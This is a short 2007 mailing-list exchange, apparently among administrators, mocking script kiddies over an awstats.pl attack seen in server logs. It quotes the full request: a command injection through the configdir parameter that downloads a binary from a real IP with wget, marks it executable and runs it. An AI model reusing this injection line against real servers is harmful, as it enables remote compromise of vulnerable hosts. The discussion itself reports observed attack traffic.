On Wed, 21 Nov 2007 14:20:22 EST, Simon Smith said:

> Anyone else seen these really 3l337 attacks?

> /stats/awstats.pl?configdir=|echo;cd%20/tmp;wget%2085.114.128.21/barbut;chmod%20755%20barbut;./barbut;echo|

> gotta love script kids...

The truly sad part is that the script apparently still works often enough that
the script kids are still using it, rather than saying "that one's crap, it
never gets me a box".

One has to wonder what level of pwnage exists on boxes that are *still*
vulnerable to this one - they may actually be reaching win98-style equilibrium.
They're old enough that everybody's hit them already, and are probably running
software *so* ancient that it's actually before most of the current crop of
vulnerabilities were discovered.

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